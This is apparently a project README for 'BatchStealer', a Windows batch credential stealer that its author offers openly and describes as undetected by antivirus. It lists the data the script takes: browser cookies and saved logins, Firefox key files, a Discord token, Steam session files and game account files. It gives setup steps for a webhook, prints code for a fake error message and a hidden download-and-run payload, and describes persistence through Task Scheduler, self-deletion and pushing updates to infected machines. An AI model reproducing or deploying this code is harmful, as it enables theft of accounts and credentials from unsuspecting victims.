BatchStealer | BatchStealer Example
My attempt at making a stealer with batch, it sucks. The script will not be updated anymore. If something, a new one would be made, this time properly. Treat the current BatchStealer as POC, not as a finished product/malware.
3.4.2021 < FUD (Virustotal)
- Change the webhook to yours.
- Remove the fail-safes. ("goto xxx")
- Run the batch file.
- Do a regex search on notepad++, match
^::.*\nand replace with nothing.
- Just changing the webhook and doing nothing else.
- If the batch file does nothing the user will open it to see what's wrong.
Almost everything is encrypted, I haven't had the patience to do that on a batch file
Full system information
- OS Name & Version
- Product ID
- System Manufacturer
- Processor(s)
- BIOS Version
- Time Zone
- Total Physical Memory
- Network Card(s)
- And more...
Chrome
- Cookies
- History
- Shortcuts
- Bookmarks
- Login Data
Opera
- Cookies
- History
- Shortcuts
- Bookmarks
- Login Data
Vivaldi
- Cookies
- History
- Shortcuts
- Bookmarks
- Login Data
Firefox
- Logins
- key3
- key4
- Cookies (Plain text!)
osu!
- osu!.cfg
Discord
- File containing a Token
- Other various files
Steam
- Logged in users (Username, email)
- Hidden ssfn files
Minecraft
- Launcher profiles and accounts
Growtopia
- Save.dat
Skip run by Task Scheduler
if not "%~dp0"=="%vpath%\" (
:: Your code not to get recurred
)Fake error message
set "vpath="
...
:: FAKE ERROR MESSAGE | REMOVE GOTO IF YOU WANT IT TO DISPLAY
:: ----------------------------------------------------------
goto skipfakeerror
if not "%~dp0"=="%vpath%\" (
start /min /b mshta vbscript:Execute("Msgbox(""Bodytext""+vbCrLf+vbCrLf+""Anotherbody""),16,""Titletext"":window.close")
)
:skipfakeerror
...Download & run payload
set "vpath="
set "webhook="
cd %vpath%
...
:: PAYLOAD - REMOVE GOTO IF YOU WANT THE SCRIPT TO DOWNLOAD AND RUN A FILE SOMEWHERE
:: ---------------------------------------------------------------------------------
goto skipcustomdownload
set "customdownloadurl=https://external.ext/file.exe"
set "customfilename=c.exe"
curl --silent --output /dev/null -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```Downloading and starting a custom file from\n%customdownloadurl% to %vpath%\%customfilename%```\"}" %webhook%
IF EXIST "%customfilename%" GOTO waitloop4
curl --silent -L --fail "%customdownloadurl%" -o "%customfilename%"
>NUL attrib "%vpath%\%customfilename%" +h
:waitloop4
IF EXIST "%customfilename%" GOTO waitloopend4
timeout /t 5 /nobreak > NUL
:waitloopend4
2> NUL start "%customfilename%"
:skipcustomdownload
...-
Delete itself after execution
-
Add itself to Task Scheduler (CMD window will be invisible when executed)
- Will make files to
C:\ProgramDataby default. (Hidden)
- Will make files to
-
Push updates to infected machine(s) (Beta, expect bugs and crashes)
- Make sure to have a working batch file's source on the link, it will replace everything.
- Ability to target specific users (Check username)
-
Take screenshot
Included on the Automatic Builder
-
Add garbage code (Confuse/Fill)
-
ObfuscateNot made yet.
- DNS poisoning
- Simple edit of the hosts file (Would require administrator)
- Other interesting stuff...
- If you want to support the project do a pull request.
- The pull request could be a new steal etc.
- You can try this
- Recurring does not work with the obfuscation. (Script exits when it reaches it)
- "Start as administrator" will make a visible error message on the CMD box.
None of the authors, contributors, or anyone else connected with this open source project, in any way whatsoever, can be responsible for your use of the information or the application contained in or linked from this repository.
Under Section 107 of the Copyright Act 1976, allowance is made for "fair use" for purposes such as criticism, comment, news reporting, teaching, scholarship and research. Fair use is a use permitted by copyright statute that might otherwise be infringing. Non-profit, educational or personal use tips the balance in favor of fair use.
If you don't agree with any of our disclaimers above, do not read the code or download anything from our repository as you have no permission to read and explore our repository until you agree.